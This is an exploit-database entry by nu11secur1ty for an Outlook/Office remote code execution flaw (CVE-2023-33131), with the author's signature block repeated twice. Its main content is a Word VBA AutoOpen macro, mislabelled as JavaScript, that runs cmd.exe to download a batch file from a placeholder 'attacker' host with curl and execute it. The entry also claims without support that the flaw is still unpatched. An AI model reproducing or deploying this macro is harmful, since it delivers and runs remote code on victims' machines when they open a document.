Share
## https://sploitus.com/exploit?id=PACKETSTORM:173361
## Title: Microsoft Outlook ®Microsoft 365 MSO (Version 2306 Build  
16.0.16529.20100) 32-bit RCE  
## Author: nu11secur1ty  
## Date: 07.07.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://outlook.live.com/owa/  
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/  
## CVE-2023-33131  
  
  
## Description:  
In this vulnerability, the Microsoft Outlook app allows an attacker to  
send an infected Word file with malicious content  
to everyone who using the Outlook app, no matter web or local.  
Microsoft still doesn't have a patch against this 0-day vulnerability today.  
  
## Staus: HIGH Vulnerability  
  
[+]Exploit:  
  
- The malicious Word file:  
  
```js  
Sub AutoOpen()  
Call Shell("cmd.exe /S /c" & "curl -s  
https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat >  
nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)  
End Sub  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)  
  
## Proof and Exploit  
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)  
  
## Time spend:  
00:30:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>